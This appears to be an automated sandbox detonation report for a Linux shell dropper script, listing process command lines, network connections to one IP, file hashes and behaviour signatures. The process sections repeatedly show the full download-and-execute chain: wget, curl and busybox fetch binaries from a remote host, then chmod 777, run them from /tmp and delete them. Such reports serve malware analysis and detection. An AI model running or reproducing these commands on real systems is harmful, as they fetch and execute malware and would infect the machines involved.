[/bin/busybox wget http://216.126.231.240/bins/eTDcY1w3gh5aYO6tO1N4qaN0q6piUltk65]
/bin/chmod
[chmod 777 eTDcY1w3gh5aYO6tO1N4qaN0q6piUltk65]
/tmp/eTDcY1w3gh5aYO6tO1N4qaN0q6piUltk65
[./eTDcY1w3gh5aYO6tO1N4qaN0q6piUltk65]
/bin/rm
[rm eTDcY1w3gh5aYO6tO1N4qaN0q6piUltk65]
/usr/bin/wget
[wget http://216.126.231.240/bins/FMQG8KSSJRTjzEZTSXIdND9PZvy2X7LIuj]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/FMQG8KSSJRTjzEZTSXIdND9PZvy2X7LIuj]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/FMQG8KSSJRTjzEZTSXIdND9PZvy2X7LIuj]
/bin/chmod
[chmod 777 FMQG8KSSJRTjzEZTSXIdND9PZvy2X7LIuj]
/tmp/FMQG8KSSJRTjzEZTSXIdND9PZvy2X7LIuj
[./FMQG8KSSJRTjzEZTSXIdND9PZvy2X7LIuj]
/bin/rm
[rm FMQG8KSSJRTjzEZTSXIdND9PZvy2X7LIuj]
/usr/bin/wget
[wget http://216.126.231.240/bins/MPXq0ebQtlVnIjDNWv7vGTg3PpH5RCViZs]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/MPXq0ebQtlVnIjDNWv7vGTg3PpH5RCViZs]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/MPXq0ebQtlVnIjDNWv7vGTg3PpH5RCViZs]
/bin/chmod
[chmod 777 MPXq0ebQtlVnIjDNWv7vGTg3PpH5RCViZs]
/tmp/MPXq0ebQtlVnIjDNWv7vGTg3PpH5RCViZs
[./MPXq0ebQtlVnIjDNWv7vGTg3PpH5RCViZs]
/bin/rm
[rm MPXq0ebQtlVnIjDNWv7vGTg3PpH5RCViZs]
/usr/bin/wget
[wget http://216.126.231.240/bins/pyNBSkRl67RcfcHuSL0zBq1WP0GOObmUpv]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/pyNBSkRl67RcfcHuSL0zBq1WP0GOObmUpv]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/pyNBSkRl67RcfcHuSL0zBq1WP0GOObmUpv]
/bin/chmod
[chmod 777 pyNBSkRl67RcfcHuSL0zBq1WP0GOObmUpv]
/tmp/pyNBSkRl67RcfcHuSL0zBq1WP0GOObmUpv
[./pyNBSkRl67RcfcHuSL0zBq1WP0GOObmUpv]
/bin/rm
[rm pyNBSkRl67RcfcHuSL0zBq1WP0GOObmUpv]
/usr/bin/wget
[wget http://216.126.231.240/bins/IVT3Iyip9vCH9TjS002jTfa2DzOAfcSpEa]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/IVT3Iyip9vCH9TjS002jTfa2DzOAfcSpEa]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/IVT3Iyip9vCH9TjS002jTfa2DzOAfcSpEa]
/bin/chmod
[chmod 777 IVT3Iyip9vCH9TjS002jTfa2DzOAfcSpEa]
/tmp/IVT3Iyip9vCH9TjS002jTfa2DzOAfcSpEa
[./IVT3Iyip9vCH9TjS002jTfa2DzOAfcSpEa]
/bin/rm
[rm IVT3Iyip9vCH9TjS002jTfa2DzOAfcSpEa]
/usr/bin/wget
[wget http://216.126.231.240/bins/L1g2hIoTYQqUPu8zxlXMujq6BQ0aGj4PfW]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/L1g2hIoTYQqUPu8zxlXMujq6BQ0aGj4PfW]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/L1g2hIoTYQqUPu8zxlXMujq6BQ0aGj4PfW]
/bin/chmod
[chmod 777 L1g2hIoTYQqUPu8zxlXMujq6BQ0aGj4PfW]
/tmp/L1g2hIoTYQqUPu8zxlXMujq6BQ0aGj4PfW
[./L1g2hIoTYQqUPu8zxlXMujq6BQ0aGj4PfW]
/bin/rm
[rm L1g2hIoTYQqUPu8zxlXMujq6BQ0aGj4PfW]
/usr/bin/wget
[wget http://216.126.231.240/bins/FMQG8KSSJRTjzEZTSXIdND9PZvy2X7LIuj]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/FMQG8KSSJRTjzEZTSXIdND9PZvy2X7LIuj]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/FMQG8KSSJRTjzEZTSXIdND9PZvy2X7LIuj]
/bin/chmod
[chmod 777 FMQG8KSSJRTjzEZTSXIdND9PZvy2X7LIuj]
/tmp/FMQG8KSSJRTjzEZTSXIdND9PZvy2X7LIuj
[./FMQG8KSSJRTjzEZTSXIdND9PZvy2X7LIuj]
/bin/rm
[rm FMQG8KSSJRTjzEZTSXIdND9PZvy2X7LIuj]
/usr/bin/wget
[wget http://216.126.231.240/bins/MPXq0ebQtlVnIjDNWv7vGTg3PpH5RCViZs]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/MPXq0ebQtlVnIjDNWv7vGTg3PpH5RCViZs]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/MPXq0ebQtlVnIjDNWv7vGTg3PpH5RCViZs]
/bin/chmod
[chmod 777 MPXq0ebQtlVnIjDNWv7vGTg3PpH5RCViZs]
/tmp/MPXq0ebQtlVnIjDNWv7vGTg3PpH5RCViZs
[./MPXq0ebQtlVnIjDNWv7vGTg3PpH5RCViZs]
/bin/rm
[rm MPXq0ebQtlVnIjDNWv7vGTg3PpH5RCViZs]
/usr/bin/wget
[wget http://216.126.231.240/bins/gHsWLXEAA34Ok0m6RB99GRwbvdLPVt3RRE]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/gHsWLXEAA34Ok0m6RB99GRwbvdLPVt3RRE]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/gHsWLXEAA34Ok0m6RB99GRwbvdLPVt3RRE]
/bin/chmod
[chmod 777 gHsWLXEAA34Ok0m6RB99GRwbvdLPVt3RRE]
/tmp/gHsWLXEAA34Ok0m6RB99GRwbvdLPVt3RRE
[./gHsWLXEAA34Ok0m6RB99GRwbvdLPVt3RRE]
/bin/rm
[rm gHsWLXEAA34Ok0m6RB99GRwbvdLPVt3RRE]
/usr/bin/wget
[wget http://216.126.231.240/bins/Lb6CShTHfvUiN9iIlGR4ASGFieLIEoyxYD]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/Lb6CShTHfvUiN9iIlGR4ASGFieLIEoyxYD]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/Lb6CShTHfvUiN9iIlGR4ASGFieLIEoyxYD]
/bin/chmod
[chmod 777 Lb6CShTHfvUiN9iIlGR4ASGFieLIEoyxYD]
/tmp/Lb6CShTHfvUiN9iIlGR4ASGFieLIEoyxYD
[./Lb6CShTHfvUiN9iIlGR4ASGFieLIEoyxYD]
/bin/rm
[rm Lb6CShTHfvUiN9iIlGR4ASGFieLIEoyxYD]
/usr/bin/wget
[wget http://216.126.231.240/bins/eTDcY1w3gh5aYO6tO1N4qaN0q6piUltk65]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/eTDcY1w3gh5aYO6tO1N4qaN0q6piUltk65]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/eTDcY1w3gh5aYO6tO1N4qaN0q6piUltk65]
/bin/chmod
[chmod 777 eTDcY1w3gh5aYO6tO1N4qaN0q6piUltk65]
/tmp/eTDcY1w3gh5aYO6tO1N4qaN0q6piUltk65
[./eTDcY1w3gh5aYO6tO1N4qaN0q6piUltk65]
/bin/rm
[rm eTDcY1w3gh5aYO6tO1N4qaN0q6piUltk65]
/usr/bin/wget
[wget http://216.126.231.240/bins/C5Hu61pxoms8k2hlFr4x40NbgSkOxMkUzR]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/C5Hu61pxoms8k2hlFr4x40NbgSkOxMkUzR]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/C5Hu61pxoms8k2hlFr4x40NbgSkOxMkUzR]
/bin/chmod
[chmod 777 C5Hu61pxoms8k2hlFr4x40NbgSkOxMkUzR]
/tmp/C5Hu61pxoms8k2hlFr4x40NbgSkOxMkUzR
[./C5Hu61pxoms8k2hlFr4x40NbgSkOxMkUzR]
/bin/rm
[rm C5Hu61pxoms8k2hlFr4x40NbgSkOxMkUzR]
/usr/bin/wget
[wget http://216.126.231.240/bins/jIiunTS73FUsOxnh4HOape1YcBamnSW5H4]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/jIiunTS73FUsOxnh4HOape1YcBamnSW5H4]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/jIiunTS73FUsOxnh4HOape1YcBamnSW5H4]
/bin/chmod
[chmod 777 jIiunTS73FUsOxnh4HOape1YcBamnSW5H4]
/tmp/jIiunTS73FUsOxnh4HOape1YcBamnSW5H4
[./jIiunTS73FUsOxnh4HOape1YcBamnSW5H4]
/bin/rm
[rm jIiunTS73FUsOxnh4HOape1YcBamnSW5H4]
/usr/bin/wget
[wget http://216.126.231.240/bins/No9wx7oCydXhyIHee1rFBAITRECLsnUBZ5]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/No9wx7oCydXhyIHee1rFBAITRECLsnUBZ5]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/No9wx7oCydXhyIHee1rFBAITRECLsnUBZ5]
/bin/chmod
[chmod 777 No9wx7oCydXhyIHee1rFBAITRECLsnUBZ5]
/tmp/No9wx7oCydXhyIHee1rFBAITRECLsnUBZ5
[./No9wx7oCydXhyIHee1rFBAITRECLsnUBZ5]
/bin/rm
[rm No9wx7oCydXhyIHee1rFBAITRECLsnUBZ5]
/usr/bin/wget
[wget http://216.126.231.240/bins/nKoSFIFR6APO75G687YBztazTOwWyWEgGY]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/nKoSFIFR6APO75G687YBztazTOwWyWEgGY]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/nKoSFIFR6APO75G687YBztazTOwWyWEgGY]
/bin/chmod
[chmod 777 nKoSFIFR6APO75G687YBztazTOwWyWEgGY]
/tmp/nKoSFIFR6APO75G687YBztazTOwWyWEgGY
[./nKoSFIFR6APO75G687YBztazTOwWyWEgGY]
/bin/rm
[rm nKoSFIFR6APO75G687YBztazTOwWyWEgGY]
/usr/bin/wget
[wget http://216.126.231.240/bins/7p68azu0EFmSJ4IRPQvG5PC3kG43rlK10W]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/7p68azu0EFmSJ4IRPQvG5PC3kG43rlK10W]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/7p68azu0EFmSJ4IRPQvG5PC3kG43rlK10W]
/bin/chmod
[chmod 777 7p68azu0EFmSJ4IRPQvG5PC3kG43rlK10W]
/tmp/7p68azu0EFmSJ4IRPQvG5PC3kG43rlK10W
[./7p68azu0EFmSJ4IRPQvG5PC3kG43rlK10W]
/bin/rm
[rm 7p68azu0EFmSJ4IRPQvG5PC3kG43rlK10W]
/usr/bin/wget
[wget http://216.126.231.240/bins/6AvuerelT2eWDA5qUF5FCM4oUIlTVMqzQ1]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/6AvuerelT2eWDA5qUF5FCM4oUIlTVMqzQ1]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/6AvuerelT2eWDA5qUF5FCM4oUIlTVMqzQ1]
/bin/chmod
[chmod 777 6AvuerelT2eWDA5qUF5FCM4oUIlTVMqzQ1]
/tmp/6AvuerelT2eWDA5qUF5FCM4oUIlTVMqzQ1
[./6AvuerelT2eWDA5qUF5FCM4oUIlTVMqzQ1]
/bin/rm
[rm 6AvuerelT2eWDA5qUF5FCM4oUIlTVMqzQ1]
Network
| Country | Destination | Domain | Proto |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
| US | 216.126.231.240:80 | 216.126.231.240 | tcp |
Files
/tmp/C5Hu61pxoms8k2hlFr4x40NbgSkOxMkUzR
| MD5 | 998368d7c95ea4293237f2320546e440 |
| SHA1 | 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4 |
| SHA256 | 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736 |
| SHA512 | 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97 |
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-14 01:33
Reported
2024-11-14 01:36
Platform
ubuntu1804-amd64-20240611-en
Max time kernel
40s
Max time network
128s
Command Line
Signatures
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
| N/A | N/A | /bin/chmod | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/C5Hu61pxoms8k2hlFr4x40NbgSkOxMkUzR | /tmp/C5Hu61pxoms8k2hlFr4x40NbgSkOxMkUzR | N/A |
| N/A | /tmp/jIiunTS73FUsOxnh4HOape1YcBamnSW5H4 | /tmp/jIiunTS73FUsOxnh4HOape1YcBamnSW5H4 | N/A |
| N/A | /tmp/No9wx7oCydXhyIHee1rFBAITRECLsnUBZ5 | /tmp/No9wx7oCydXhyIHee1rFBAITRECLsnUBZ5 | N/A |
| N/A | /tmp/nKoSFIFR6APO75G687YBztazTOwWyWEgGY | /tmp/nKoSFIFR6APO75G687YBztazTOwWyWEgGY | N/A |
| N/A | /tmp/7p68azu0EFmSJ4IRPQvG5PC3kG43rlK10W | /tmp/7p68azu0EFmSJ4IRPQvG5PC3kG43rlK10W | N/A |
| N/A | /tmp/6AvuerelT2eWDA5qUF5FCM4oUIlTVMqzQ1 | /tmp/6AvuerelT2eWDA5qUF5FCM4oUIlTVMqzQ1 | N/A |
| N/A | /tmp/pyNBSkRl67RcfcHuSL0zBq1WP0GOObmUpv | /tmp/pyNBSkRl67RcfcHuSL0zBq1WP0GOObmUpv | N/A |
| N/A | /tmp/IVT3Iyip9vCH9TjS002jTfa2DzOAfcSpEa | /tmp/IVT3Iyip9vCH9TjS002jTfa2DzOAfcSpEa | N/A |
| N/A | /tmp/L1g2hIoTYQqUPu8zxlXMujq6BQ0aGj4PfW | /tmp/L1g2hIoTYQqUPu8zxlXMujq6BQ0aGj4PfW | N/A |
| N/A | /tmp/gHsWLXEAA34Ok0m6RB99GRwbvdLPVt3RRE | /tmp/gHsWLXEAA34Ok0m6RB99GRwbvdLPVt3RRE | N/A |
| N/A | /tmp/Lb6CShTHfvUiN9iIlGR4ASGFieLIEoyxYD | /tmp/Lb6CShTHfvUiN9iIlGR4ASGFieLIEoyxYD | N/A |
| N/A | /tmp/eTDcY1w3gh5aYO6tO1N4qaN0q6piUltk65 | /tmp/eTDcY1w3gh5aYO6tO1N4qaN0q6piUltk65 | N/A |
| N/A | /tmp/FMQG8KSSJRTjzEZTSXIdND9PZvy2X7LIuj | /tmp/FMQG8KSSJRTjzEZTSXIdND9PZvy2X7LIuj | N/A |
| N/A | /tmp/MPXq0ebQtlVnIjDNWv7vGTg3PpH5RCViZs | /tmp/MPXq0ebQtlVnIjDNWv7vGTg3PpH5RCViZs | N/A |
| N/A | /tmp/pyNBSkRl67RcfcHuSL0zBq1WP0GOObmUpv | /tmp/pyNBSkRl67RcfcHuSL0zBq1WP0GOObmUpv | N/A |
| N/A | /tmp/IVT3Iyip9vCH9TjS002jTfa2DzOAfcSpEa | /tmp/IVT3Iyip9vCH9TjS002jTfa2DzOAfcSpEa | N/A |
| N/A | /tmp/L1g2hIoTYQqUPu8zxlXMujq6BQ0aGj4PfW | /tmp/L1g2hIoTYQqUPu8zxlXMujq6BQ0aGj4PfW | N/A |
| N/A | /tmp/FMQG8KSSJRTjzEZTSXIdND9PZvy2X7LIuj | /tmp/FMQG8KSSJRTjzEZTSXIdND9PZvy2X7LIuj | N/A |
| N/A | /tmp/MPXq0ebQtlVnIjDNWv7vGTg3PpH5RCViZs | /tmp/MPXq0ebQtlVnIjDNWv7vGTg3PpH5RCViZs | N/A |
| N/A | /tmp/gHsWLXEAA34Ok0m6RB99GRwbvdLPVt3RRE | /tmp/gHsWLXEAA34Ok0m6RB99GRwbvdLPVt3RRE | N/A |
| N/A | /tmp/Lb6CShTHfvUiN9iIlGR4ASGFieLIEoyxYD | /tmp/Lb6CShTHfvUiN9iIlGR4ASGFieLIEoyxYD | N/A |
| N/A | /tmp/eTDcY1w3gh5aYO6tO1N4qaN0q6piUltk65 | /tmp/eTDcY1w3gh5aYO6tO1N4qaN0q6piUltk65 | N/A |
| N/A | /tmp/C5Hu61pxoms8k2hlFr4x40NbgSkOxMkUzR | /tmp/C5Hu61pxoms8k2hlFr4x40NbgSkOxMkUzR | N/A |
| N/A | /tmp/jIiunTS73FUsOxnh4HOape1YcBamnSW5H4 | /tmp/jIiunTS73FUsOxnh4HOape1YcBamnSW5H4 | N/A |
| N/A | /tmp/No9wx7oCydXhyIHee1rFBAITRECLsnUBZ5 | /tmp/No9wx7oCydXhyIHee1rFBAITRECLsnUBZ5 | N/A |
| N/A | /tmp/nKoSFIFR6APO75G687YBztazTOwWyWEgGY | /tmp/nKoSFIFR6APO75G687YBztazTOwWyWEgGY | N/A |
| N/A | /tmp/7p68azu0EFmSJ4IRPQvG5PC3kG43rlK10W | /tmp/7p68azu0EFmSJ4IRPQvG5PC3kG43rlK10W | N/A |
| N/A | /tmp/6AvuerelT2eWDA5qUF5FCM4oUIlTVMqzQ1 | /tmp/6AvuerelT2eWDA5qUF5FCM4oUIlTVMqzQ1 | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /tmp/IVT3Iyip9vCH9TjS002jTfa2DzOAfcSpEa | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/rm | N/A |
| N/A | N/A | /usr/bin/curl | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
| N/A | N/A | /bin/busybox | N/A |
| N/A | N/A | /tmp/IVT3Iyip9vCH9TjS002jTfa2DzOAfcSpEa | N/A |
| N/A | N/A | /usr/bin/wget | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/C5Hu61pxoms8k2hlFr4x40NbgSkOxMkUzR | /usr/bin/curl | N/A |
| File opened for modification | /tmp/nKoSFIFR6APO75G687YBztazTOwWyWEgGY | /usr/bin/curl | N/A |
| File opened for modification | /tmp/7p68azu0EFmSJ4IRPQvG5PC3kG43rlK10W | /usr/bin/curl | N/A |
| File opened for modification | /tmp/6AvuerelT2eWDA5qUF5FCM4oUIlTVMqzQ1 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/gHsWLXEAA34Ok0m6RB99GRwbvdLPVt3RRE | /usr/bin/curl | N/A |
| File opened for modification | /tmp/FMQG8KSSJRTjzEZTSXIdND9PZvy2X7LIuj | /usr/bin/curl | N/A |
| File opened for modification | /tmp/pyNBSkRl67RcfcHuSL0zBq1WP0GOObmUpv | /usr/bin/curl | N/A |
| File opened for modification | /tmp/C5Hu61pxoms8k2hlFr4x40NbgSkOxMkUzR | /usr/bin/curl | N/A |
| File opened for modification | /tmp/jIiunTS73FUsOxnh4HOape1YcBamnSW5H4 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/eTDcY1w3gh5aYO6tO1N4qaN0q6piUltk65 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/No9wx7oCydXhyIHee1rFBAITRECLsnUBZ5 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/L1g2hIoTYQqUPu8zxlXMujq6BQ0aGj4PfW | /usr/bin/curl | N/A |
| File opened for modification | /tmp/MPXq0ebQtlVnIjDNWv7vGTg3PpH5RCViZs | /usr/bin/curl | N/A |
| File opened for modification | /tmp/jIiunTS73FUsOxnh4HOape1YcBamnSW5H4 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/IVT3Iyip9vCH9TjS002jTfa2DzOAfcSpEa | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Lb6CShTHfvUiN9iIlGR4ASGFieLIEoyxYD | /usr/bin/curl | N/A |
| File opened for modification | /tmp/FMQG8KSSJRTjzEZTSXIdND9PZvy2X7LIuj | /usr/bin/curl | N/A |
| File opened for modification | /tmp/7p68azu0EFmSJ4IRPQvG5PC3kG43rlK10W | /usr/bin/curl | N/A |
| File opened for modification | /tmp/MPXq0ebQtlVnIjDNWv7vGTg3PpH5RCViZs | /usr/bin/curl | N/A |
| File opened for modification | /tmp/Lb6CShTHfvUiN9iIlGR4ASGFieLIEoyxYD | /usr/bin/curl | N/A |
| File opened for modification | /tmp/nKoSFIFR6APO75G687YBztazTOwWyWEgGY | /usr/bin/curl | N/A |
| File opened for modification | /tmp/6AvuerelT2eWDA5qUF5FCM4oUIlTVMqzQ1 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/gHsWLXEAA34Ok0m6RB99GRwbvdLPVt3RRE | /usr/bin/curl | N/A |
| File opened for modification | /tmp/pyNBSkRl67RcfcHuSL0zBq1WP0GOObmUpv | /usr/bin/curl | N/A |
| File opened for modification | /tmp/eTDcY1w3gh5aYO6tO1N4qaN0q6piUltk65 | /usr/bin/curl | N/A |
| File opened for modification | /tmp/IVT3Iyip9vCH9TjS002jTfa2DzOAfcSpEa | /usr/bin/curl | N/A |
| File opened for modification | /tmp/L1g2hIoTYQqUPu8zxlXMujq6BQ0aGj4PfW | /usr/bin/curl | N/A |
| File opened for modification | /tmp/No9wx7oCydXhyIHee1rFBAITRECLsnUBZ5 | /usr/bin/curl | N/A |
Processes
/tmp/4aa5ab11bd6f613478208b74ffefcd67594912de8b15bc52edf572a0367d01e0.sh
[/tmp/4aa5ab11bd6f613478208b74ffefcd67594912de8b15bc52edf572a0367d01e0.sh]
/bin/rm
[/bin/rm bins.sh]
/usr/bin/wget
[wget http://216.126.231.240/bins/C5Hu61pxoms8k2hlFr4x40NbgSkOxMkUzR]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/C5Hu61pxoms8k2hlFr4x40NbgSkOxMkUzR]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/C5Hu61pxoms8k2hlFr4x40NbgSkOxMkUzR]
/bin/chmod
[chmod 777 C5Hu61pxoms8k2hlFr4x40NbgSkOxMkUzR]
/tmp/C5Hu61pxoms8k2hlFr4x40NbgSkOxMkUzR
[./C5Hu61pxoms8k2hlFr4x40NbgSkOxMkUzR]
/bin/rm
[rm C5Hu61pxoms8k2hlFr4x40NbgSkOxMkUzR]
/usr/bin/wget
[wget http://216.126.231.240/bins/jIiunTS73FUsOxnh4HOape1YcBamnSW5H4]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/jIiunTS73FUsOxnh4HOape1YcBamnSW5H4]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/jIiunTS73FUsOxnh4HOape1YcBamnSW5H4]
/bin/chmod
[chmod 777 jIiunTS73FUsOxnh4HOape1YcBamnSW5H4]
/tmp/jIiunTS73FUsOxnh4HOape1YcBamnSW5H4
[./jIiunTS73FUsOxnh4HOape1YcBamnSW5H4]
/bin/rm
[rm jIiunTS73FUsOxnh4HOape1YcBamnSW5H4]
/usr/bin/wget
[wget http://216.126.231.240/bins/No9wx7oCydXhyIHee1rFBAITRECLsnUBZ5]
/usr/bin/curl
[curl -O http://216.126.231.240/bins/No9wx7oCydXhyIHee1rFBAITRECLsnUBZ5]
/bin/busybox
[/bin/busybox wget http://216.126.231.240/bins/No9wx7oCydXhyIHee1rFBAITRECLsnUBZ5]
/bin/chmod
[chmod 777 No9wx7oCydXhyIHee1rFBAITRECLsnUBZ5]
/tmp/No9wx7oCydXhyIHee1rFBAITRECLsnUBZ5
